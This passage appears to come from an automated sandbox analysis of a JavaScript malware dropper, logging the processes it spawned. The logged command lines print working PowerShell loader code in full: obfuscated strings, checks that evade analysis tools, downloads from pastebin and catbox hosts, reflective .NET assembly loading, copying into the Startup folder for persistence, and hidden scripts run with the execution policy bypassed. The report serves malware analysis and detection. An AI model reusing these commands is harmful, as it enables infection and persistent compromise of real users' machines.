= [system.text.encoding]::utf8.getstring($ldmxc);$sxrcf | out-file -filepath $lyjkg -force ;$eutza = '$tfyio = ( [system.io.path]::gettemppath() + ''dll02.txt'') ;$ryaeg = (get-content -path $tfyio -encoding utf8);' ;$eutza += '[byte[]] $eatvh = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$eutza += '[system.appdomain]:' + ':currentdomain.load( $eatvh ).' ;$eutza += 'gettype( ''classlibrary3.class1'' ).getm' ;$eutza += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''txt.5202-yzx-daerps-mer/moc.seplaenohreruemed//:sptth'' , ''c:\users\user\downloads\f-2025-0855\f-2025-0855.js'' , ''d ddc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$xvcti = ([system.io.path]::gettemppath() + 'dll03.ps1') ;$eutza | out-file -filepath $xvcti -force ;powershell -executionpolicy bypass -file $xvcti ;};"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $wgkxz = 'ja' + [char]66 + 'mafqaaw' + [char]66 + 'aafoaiaa9acaaja' + [char]66 + 'oag8acw' + [char]66 + '0ac4avg' + [char]66 + 'lahiacw' + [char]66 + 'pag8abgauae0ayq' + [char]66 + 'qag8acgauaeuacq' + [char]66 + '1ageaba' + [char]66 + 'zacgamgapadsasq' + [char]66 + 'macaakaagacqata' + [char]66 + 'uagsawg' + [char]66 + 'aacaakqagahsaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaa9acaaka' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4asq' + [char]66 + 'pac4aua' + [char]66 + 'hahqaaa' + [char]66 + 'dadoaog' + [char]66 + 'haguada' + [char]66 + 'uaguabq' + [char]66 + 'wafaayq' + [char]66 + '0aggakaapackaow' + [char]66 + 'kaguabaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqa7acqabg' + [char]66 + 'nahmaza' + [char]66 + 'wacaapqagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagyaaq' + [char]66 + 'saguacwauagmayq' + [char]66 + '0agiabw' + [char]66 + '4ac4abq' + [char]66 + 'vagualw' + [char]66 + 'zageaaw' + [char]66 + '1ahuabwauag0acw' + [char]66 + '1accaowakag0azq' + [char]66 + 'uag8acwagad0aiaanaggada' + [char]66 + '0ahaacwa6ac8alw' + [char]66 + 'magkaba' + [char]66 + 'lahmalg' + [char]66 + 'jageada' + [char]66 + 'iag8aeaauag0abw' + [char]66 + 'lac8ang' + [char]66 + 'zagqaag' + [char]66 + 'jadualg' + [char]66 + 'tahmadqanadsaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaa9acaaja' + [char]66 + 'lag4adga6afaaug' + [char]66 + 'paemarq' + [char]66 + 'tafmatw' + [char]66 + 'saf8aqq' + [char]66 + 'saemasa' + [char]66 + 'jafqarq' + [char]66 + 'dafqavq' + [char]66 + 'saeualg' + [char]66 + 'dag8abg' + [char]66 + '0ageaaq' + [char]66 + 'uahmakaanadyanaanackaow' + [char]66 + 'pagyaiaaoacaaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaapacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaakag0azq' + [char]66 + 'uag8acwagadsafq' + [char]66 + 'lagwacw' + [char]66 + 'lacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaaoacqabg' + [char]66 + 'nahmaza' + [char]66 + 'wackaiaa7ah0aowakahkaaw' + [char]66 + 'oahkabgagad0aiaaoacaatg' + [char]66 + 'lahcalq' + [char]66 + 'pagiaag' + [char]66 + 'lagmadaagae4azq' + [char]66 + '0ac4avw' + [char]66 + 'lagiaqw' + [char]66 + 'sagkazq' + [char]66 + 'uahqaiaapacaaowakahkaaw' + [char]66 + 'oahkabgauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azwagad0aia' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4ava' + [char]66 + 'lahgadaauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azw' + [char]66 + 'dadoaog' + [char]66 + 'vafqarga4acaaowakahkaaw' + [char]66 + 'oahkabgauaeqabw' + [char]66 + '3ag4aba' + [char]66 + 'vageaza' + [char]66 + 'gagkaba' + [char]66 + 'lacgaja' + [char]66 + 'uagcacw' + [char]66 + 'kahaalaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqagackaiaa7acqazg' + [char]66 + 'waeqa
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $wgkxz = 'ja' + [char]66 + 'mafqaaw' + [char]66 + 'aafoaiaa9acaaja' + [char]66 + 'oag8acw' + [char]66 + '0ac4avg' + [char]66 + 'lahiacw' + [char]66 + 'pag8abgauae0ayq' + [char]66 + 'qag8acgauaeuacq' + [char]66 + '1ageaba' + [char]66 + 'zacgamgapadsasq' + [char]66 + 'macaakaagacqata' + [char]66 + 'uagsawg' + [char]66 + 'aacaakqagahsaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaa9acaaka' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4asq' + [char]66 + 'pac4aua' + [char]66 + 'hahqaaa' + [char]66 + 'dadoaog' + [char]66 + 'haguada' + [char]66 + 'uaguabq' + [char]66 + 'wafaayq' + [char]66 + '0aggakaapackaow' + [char]66 + 'kaguabaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqa7acqabg' + [char]66 + 'nahmaza' + [char]66 + 'wacaapqagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagyaaq' + [char]66 + 'saguacwauagmayq' + [char]66 + '0agiabw' + [char]66 + '4ac4abq' + [char]66 + 'vagualw' + [char]66 + 'zageaaw' + [char]66 + '1ahuabwauag0acw' + [char]66 + '1accaowakag0azq' + [char]66 + 'uag8acwagad0aiaanaggada' + [char]66 + '0ahaacwa6ac8alw' + [char]66 + 'magkaba' + [char]66 + 'lahmalg' + [char]66 + 'jageada' + [char]66 + 'iag8aeaauag0abw' + [char]66 + 'lac8ang' + [char]66 + 'zagqaag' + [char]66 + 'jadualg' + [char]66 + 'tahmadqanadsaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaa9acaaja' + [char]66 + 'lag4adga6afaaug' + [char]66 + 'paemarq' + [char]66 + 'tafmatw' + [char]66 + 'saf8aqq' + [char]66 + 'saemasa' + [char]66 + 'jafqarq' + [char]66 + 'dafqavq' + [char]66 + 'saeualg' + [char]66 + 'dag8abg' + [char]66 + '0ageaaq' + [char]66 + 'uahmakaanadyanaanackaow' + [char]66 + 'pagyaiaaoacaaja' + [char]66 + 'faggazw' + [char]66 + 'wahcaiaapacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaakag0azq' + [char]66 + 'uag8acwagadsafq' + [char]66 + 'lagwacw' + [char]66 + 'lacaaewakag4azw' + [char]66 + 'zagqacaagad0aiaaoacqabg' + [char]66 + 'nahmaza' + [char]66 + 'wackaiaa7ah0aowakahkaaw' + [char]66 + 'oahkabgagad0aiaaoacaatg' + [char]66 + 'lahcalq' + [char]66 + 'pagiaag' + [char]66 + 'lagmadaagae4azq' + [char]66 + '0ac4avw' + [char]66 + 'lagiaqw' + [char]66 + 'sagkazq' + [char]66 + 'uahqaiaapacaaowakahkaaw' + [char]66 + 'oahkabgauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azwagad0aia' + [char]66 + 'bafmaeq' + [char]66 + 'zahqazq' + [char]66 + 'tac4ava' + [char]66 + 'lahgadaauaeuabg' + [char]66 + 'jag8aza' + [char]66 + 'pag4azw' + [char]66 + 'dadoaog' + [char]66 + 'vafqarga4acaaowakahkaaw' + [char]66 + 'oahkabgauaeqabw' + [char]66 + '3ag4aba' + [char]66 + 'vageaza' + [char]66 + 'gagkaba' + [char]66 + 'lacgaja' + [char]66 + 'uagcacw' + [char]66 + 'kahaalaagacgaja' + [char]66 + 'magiasw' + [char]66 + 'oafkaiaaracaajw' + [char]66 + 'cafuaca' + [char]66 + '3agkabgauag0acw' + [char]66 + '1accakqagackaiaa7acqazg' + [char]66 + 'waeqa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ltkzz = $host.version.major.equals(2);if ( $ltkzz ) {$fbkny = ([system.io.path]::gettemppath());del ($fbkny + '\upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$ehgvw = $env:processor_architecture.contains('64');if ( $ehgvw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( new-object net.webclient ) ;$ykhyn.encoding = [system.text.encoding]::utf8 ;$ykhyn.downloadfile($ngsdp, ($fbkny + '\upwin.msu') ) ;$fvdsw = ( 'c:\users\' + [environment]::username );$bjtxj = ( $fbkny + '\upwin.msu' ) ; powershell.exe wusa.exe $bjtxj /quiet /norestart ; copy-item 'c:\users\user\downloads\f-2025-0855\f-2025-0855.js' -destination ( $fvdsw + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true} ;[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit ; } ;$stringbase;function basemy{;$eatvh = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($stringbase));return $eatvh;};$nhqvr = ('https://pastebin.com/raw/byrrps5m' );$cznqf = ( [system.io.path]::gettemppath() + 'dll01.txt');$webclient = new-object system.net.webclient ;$vfjrd = $webclient.downloadstring( $nhqvr ) ;$stringbase = $vfjrd; $vfjrd = basemy;$vfjrd | out-file -filepath $cznqf -encoding 'utf8' -force ;$lyjkg = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$bkrsr = new-object system.net.webclient ;$bkrsr.encoding = [system.text.encoding]::utf8 ;$nfuqg = ( get-content -path $cznqf ) ;$ldmxc = $bkrsr.downloaddata( $nfuqg ) ;$sxrcf = [system.text.encoding]::utf8.getstring($ldmxc);$sxrcf | out-file -filepath $lyjkg -force ;$eutza = '$tfyio = ( [system.io.path]::gettemppath() + ''dll02.txt'') ;$ryaeg = (get-content -path $tfyio -encoding utf8);' ;$eutza += '[byte[]] $eatvh = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$eutza += '[system.appdomain]:' + ':currentdomain.load( $eatvh ).' ;$eutza += 'gettype( ''classlibrary3.class1'' ).getm' ;$eutza += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''txt.5202-yzx-daerps-mer/moc.seplaenohreruemed//:sptth'' , ''c:\users\user\downloads\f-2025-0855\f-2025-0855.js'' , ''d ddc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$xvcti = ([system.io.path]::gettemppath() + 'dll03.ps1') ;$eutza | out-file -filepath $xvcti -force ;powershell -executionpolicy bypass -file $xvcti ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ltkzz = $host.version.major.equals(2);if ( $ltkzz ) {$fbkny = ([system.io.path]::gettemppath());del ($fbkny + '\upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$ehgvw = $env:processor_architecture.contains('64');if ( $ehgvw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( new-object net.webclient ) ;$ykhyn.encoding = [system.text.encoding]::utf8 ;$ykhyn.downloadfile($ngsdp, ($fbkny + '\upwin.msu') ) ;$fvdsw = ( 'c:\users\' + [environment]::username );$bjtxj = ( $fbkny + '\upwin.msu' ) ; powershell.exe wusa.exe $bjtxj /quiet /norestart ; copy-item 'c:\users\user\downloads\f-2025-0855\f-2025-0855.js' -destination ( $fvdsw + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true} ;[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12 ;if((get-process 'wireshark','apatedns','analyze' -ea silentlycontinue) -eq $null){ } else{ restart-computer -force ; exit ; } ;$stringbase;function basemy{;$eatvh = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($stringbase));return $eatvh;};$nhqvr = ('https://pastebin.com/raw/byrrps5m' );$cznqf = ( [system.io.path]::gettemppath() + 'dll01.txt');$webclient = new-object system.net.webclient ;$vfjrd = $webclient.downloadstring( $nhqvr ) ;$stringbase = $vfjrd; $vfjrd = basemy;$vfjrd | out-file -filepath $cznqf -encoding 'utf8' -force ;$lyjkg = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$bkrsr = new-object system.net.webclient ;$bkrsr.encoding = [system.text.encoding]::utf8 ;$nfuqg = ( get-content -path $cznqf ) ;$ldmxc = $bkrsr.downloaddata( $nfuqg ) ;$sxrcf = [system.text.encoding]::utf8.getstring($ldmxc);$sxrcf | out-file -filepath $lyjkg -force ;$eutza = '$tfyio = ( [system.io.path]::gettemppath() + ''dll02.txt'') ;$ryaeg = (get-content -path $tfyio -encoding utf8);' ;$eutza += '[byte[]] $eatvh = [system.convert]::frombase64string( $ryaeg.replace(''?:?'',''a'') ) ;' ;$eutza += '[system.appdomain]:' + ':currentdomain.load( $eatvh ).' ;$eutza += 'gettype( ''classlibrary3.class1'' ).getm' ;$eutza += 'ethod( ''prfvi'' ).invoke( $null , [object[]] ( ''txt.5202-yzx-daerps-mer/moc.seplaenohreruemed//:sptth'' , ''c:\users\user\downloads\f-2025-0855\f-2025-0855.js'' , ''d ddc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$xvcti = ([system.io.path]::gettemppath() + 'dll03.ps1') ;$eutza | out-file -filepath $xvcti -force ;powershell -executionpolicy bypass -file $xvcti ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\oqesy.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\wbhes.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\oqesy.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\wbhes.ps1'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qdnjv.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\vogrr.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\vogrr.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qdnjv.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\oqesy.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\wbhes.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\vogrr.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -file "c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qdnjv.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\qdnjv.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -windowstyle hidden start-sleep -seconds 1 ; powershell.exe -windowstyle hidden -executionpolicy bypass -file 'c:\users\user\appdata\locallow\daft sytem (x86)\program rules nvideo\program rules nvideo\program rules nvideo\program rules nvideo\vogrr.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
